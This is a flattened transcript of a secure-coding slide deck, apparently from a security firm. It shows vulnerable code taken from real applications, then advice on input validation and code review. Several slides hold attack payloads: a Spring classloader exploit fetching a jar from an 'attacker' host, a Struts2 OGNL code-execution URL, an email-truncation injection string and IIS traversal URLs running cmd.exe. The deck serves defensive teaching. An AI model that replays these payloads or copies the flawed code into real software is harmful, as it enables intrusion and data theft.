1 / 44

IS AT HOME

DON’T TRY TH. IS AT HOME. Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really. JAVA. PERL. PHP. PYTHON. ASP. FLASH. C#. C, C++. VB.Net. CFML.

tobit
Download Presentation

IS AT HOME

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. DON’T TRY TH IS AT HOME

  2. Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really...

  3. JAVA PERL PHP PYTHON ASP FLASH C# C, C++ VB.Net CFML All Languages Can Lead To Security Vulnerabilities

  4. Security Vulnerability

  5. Abritrary Graph Of Statistics Of Vulnerabilities 3rd Hit Is A Vulnerability In A Graph Application And Its SQL Injection Have I Mentioned 2010 Yet?

  6. Abritrary Graph Of Statistics Of Vulnerabilities http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf

  7. Abritrary Graph Of Statistics Of Vulnerabilities http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf

  8. Abritrary Graph Of Statistics Of Vulnerabilities Huh? http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf

  9. Apologies The code you are about to see comes from real applications, only the variable names have been changed to protect the guilty. If this code resembles yours, you may want to take notes...

  10. What's Wrong With This Picture if (!string.IsNullOrEmpty( Request.QueryString["Eid"])) CMSMain.WhereCondition = "TitleIDIN (SELECT TitleID FROM CMS_Documents WHERE EID = " + Request.QueryString["Eid"] + ")“; Data Access Through Framework Frameworks Don’t Always Protect You

  11. Frameworks Segway....

  12. Framework Bugs Spring Framework • Spring Framework execution of arbitrary code • http://blog.o0o.nu/2010/06/cve-2010-1622.html Any Form Controller POST /adduser HTTP/1.0 ... class.classLoader.URLs[0]= jar:http://attacker/spring-exploit.jar!/ Overwrite The WebappClassLoader URL With An Arbitrary Remote Jar

  13. Framework Bugs Struts2/XWork Framework • Struts2 Framework execution of arbitrary code • http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html http://mydomain/MyStruts.action? ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) (('\u0023context[\'xwork.MethodAccessor.den yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf) (('\u0023rt.exit(1)') (\u0023rt\u003d@java.lang.Runtime@getRunti me()))=1 Execute Arbitrary Java Code

  14. OWASP Top 10 “Lets make a list...”

  15. Trusting Filenames From The User Image Loader • Called via pages to display images • Passed an image name in the URL public void ProcessRequest(HttpContext context) { string ImageUrl = context.Request.QueryString["ImageUrl"]; .. context.Response.WriteFile(ImageUrl); } Retrieve Arbitrary File From Server

  16. Trusting URLS From The User Help System Page Loader • Called to load help contents from other server • Passed a page reference in the URL public byte[] GetBytesFromUrl(string url) { HttpWebRequest myReq = WebRequest.Create(url); var webResponse = webRequest.GetResponse(); using (var responseStream = webResponse.GetResponseStream()) { return responseStream.ToBytes(); } } Make Internal Network Requests

  17. Using 302 Redirect As Security Measure Making Unauthenticated Request • Results in a 302 redirect to the login page HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226 <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/admin/login">here</a>.</h2> </body></html> That Seems Suspiciously Large

  18. Using 302 Redirect As Security Measure HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226 <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/admin/login">here</a>.</h2> </body></html> <html> <head id="_ctl1_Head1"><title> File Upload </title><link href=“ Oh there it is.

  19. CAPTCHAS Things that work

  20. CAPTCHAS Things that DO NOT work • Posting the CAPTCHA answer and response • Posting the CAPTCHA ‘id’ and response • Using HTML to display the CAPTCHA ‘word’ • Using HTML to display a mathematical equation to solve POST /captcha HTTP/1.0 answer=kbpsh&response=kbpsh.... <html> Please type in these letters: kbpsh </html>

  21. Shopping Cart Troubles Usual Shopping Process

  22. Shopping Cart Troubles My Shopping Process Add To Cart Contents After Payment Processed

  23. Flash Accepts User Input Image Loader • Flash loaded by HTML page • HTML page sets parameters Can Be Set Via URL Parameters private var imgPath:String; imgPath = "http://localhost/sample.jpg" : img = this.loaderInfo.parameters.img; img_holder = new Image(imgPath); Flash Movie Host On Your Site, Loading Images From Attackers Site

  24. Cross System Data Truncation Forgotten Password Feature • Page accepts email address and checks it is valid strEmail = Request.Form("txtemail") If strEmail <> "" Then objQRY.ClearParameters objQRY.AddParameter "@email", trim(strEmail) set rsLogin = objQRY.ReturnRS("spUserMatch") Calls A Stored Procedure

  25. Cross System Data Truncation Forgotten Password Feature • Stored procedures does a user lookup CREATE PROCEDURE [dbo].[spUserMatch] @email varchar(100) = null ... Truncates Input To 100 Characters

  26. Cross System Data Truncation Forgotten Password Feature • If user exists, send email with new password Set Mailer = Server.CreateObject("SMTPsvg.Mailer") Mailer.Subject = "New Password" Mailer.BodyText = strBody Mailer.Recipient = strEmail Uses The Original Input (Non Truncated) Attacker Receives Copy Of Email <valid email address><100 spaces>;<attacker email address>

  27. Cookie Data Serialisation Object Serialised • Base64 encoded and stored as cookie // create map java.util.HashMap map = new java.util.HashMap(); map.put("UserId", UserId); map.put("email", email); // Serialise and B64 it String info = java.net.URLEncoder.encode(new String(org.apache.commons.codec.binary.Base64.encodeBase64(buffer.toByteArray()),"UTF-8"),"UTF-8"); // Store it in cookie org.apache.cocoon.environment.http.HttpCookie cookie = new org.apache.cocoon.environment.http.HttpCookie("SESSION", info);

  28. Cookie Data Serialisation Object Is Stored Insecurely In Cookie • Base64 is not encryption Cookie Data Can Be Decoded • And modified • And recoded • And sent back Application Deserialises It • And trusts it • And attacker gains access as another userID

  29. Lets Not Leave Out PHP Execute System() With User Supplied Input • This was for real.... In a ‘security’ appliance used by .mil if ($_GET["cmd"] == "TERMEND") { $sid = $_GET["param"]; $cmd = "/var/www/htdocs/utt/Queue.pl delete_message_queue $sid"; system($cmd); Did I Mention That It Was Unauthenticated Access

  30. Cookies Well, This Sure Looks Useful void CheckLoginCount() { HttpCookie cookie = Request.Cookies["LoginAttempts"]; if (cookie != null) { int attempts = cookie.Value; if (attempts >= 5) Redirect("~/AccessDenied.aspx”); } }

  31. More Cookies Remember Me Functionality • User selects remember me • Application generates random token • Stores token in cookie, and in database $token = substr(md5(uniqid(rand(), true)), 0, 49 - strlen($this->ID)); $this->RememberLoginToken = $token; Cookie::set('rem_me', $this->ID . ':' . $token);

  32. More Cookies Remember Me Functionality • User selects to logout • Application sets token to null • Stores null in cookie, and in database $this->RememberLoginToken = null; Cookie::set('rem_enc', null);

  33. More Cookies Remember Me Functionality • If the user doesn’t logout they use the autologin feature • Application loads user based on cookie value • Application checks the $tokens match list($uid, $token) = explode(':', Cookie::get(‘rem_me'), 2); $a_uid = Convert::raw2sql($uid); $user = DataObject:: get_one(“User", “User.ID = '$a_uid'"); if($user && $user->RememberLoginToken != $token) { $member = null; } What Happens If $token is empty (null)

  34. Evil Users Never Trust User Supplied Input No really, users are evil And Hands Leap Out Of Matrix Style Backgrounds

  35. Input Validation Input Validation Is The Key • No I didn’t say ‘silver bullet’ • Properly implemented can prevent most app vulns Validate At Input • Validate all input to ensure if conforms to the required format Validate All Input • Text strings, Cookie values, HTTP headers • File data, Path names, URL values, Currency • Data from databases, 3rd parties, web services

  36. Client Site Validation • Should only be used to reduce browser requests • Never rely on client side validation for security Backend Validation • Validate the data • Ensure the user is authorised to access data records • Should not matter what values the user sends

  37. Data Normalisation Data Comes In Many Forms • “this is data” • %74%68%69%73%20%69%73%20%64%61%74%61 • &#x74;&#x68;&#x69;&#x73;&#x20;&#x69;&#x73;&#x20;&#x64;&#x61;&#x74;&#x61; • “ThIsiSdAtA” Many paths to the same location • /help.jsp?page=user/welcome.htm • /help.jsp?page=user/../admin/welcome.htm • /help.jsp?page=user\..\admin/welcome.htm • /help.jsp?page=user\/\/..//\\/admin/welcome.htm • /help.jsp?page=help.jsp

  38. Data Decoding or Normalisation Depending On Application • Decode or reject Detect Encoded Data • Decode the data and compare to original Decode Recursively To Its Lowest Form • Concatenation of paths • Multiple layers of encoding Formalise Decoding Order • To prevent unintended decoding later in the application

  39. Data Decoding And Validation FAIL MS Extended Unicode vulnerability MS Double Decode vulnerability NGINX Source Code Disclosure /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir http://www.example.com/file.php%20

  40. Conforms Ensure Data Conforms To Required Format • Check length, type, min() max() values • Alphanumeric only • Must be a valid date Reject Bad Data • Do not attempt to fix it up • Easily leads to confusion Use Data Whitelists • Checks against a list of known good values • Easier to know which values are good input • The recommended approach

  41. Santise Data For Use Data Will Be Used In Different Place • SQL, XML, Output, Log files Requires Different Sanitisation • Remove meta chars • Remove special characters • Remove Linefeeds Use Standard Formalised Reusable Code Blocks • Most languages contain these • OWASP supplies some • Homebrew stuff should be well tested and documented at the start of development

  42. When Filtering Goes Wrong This Is Not Filtering And Yes, XSS without <script> is possible Don’t Forget To Escape The Escape Character If (imageurl = “/web.config”) exit() If (req.getParameter(‘name’) .indexOf("<script") > 0 exit() input.Replace("+", "\\+").Replace("=", "\\=").Replace("(", "\\(").Replace(")", "\\)") .Replace("*", "\\*").Replace("&", "\\&").Replace("!", "\\!").Replace("|","\\|"));

  43. Back To The Code Things To Try At Home • Review your own code • Conduct internal peer reviews • Have a set of standards, and stick to them Grepping The Code • Looking for where user input is used • Looking for dangerous syntax use • Particular attention to ‘danger areas’ such as file upload • Review the stored procedures Think Like An Attacker • Want to ‘break the code’

  44. www.insomniasec.com

More Related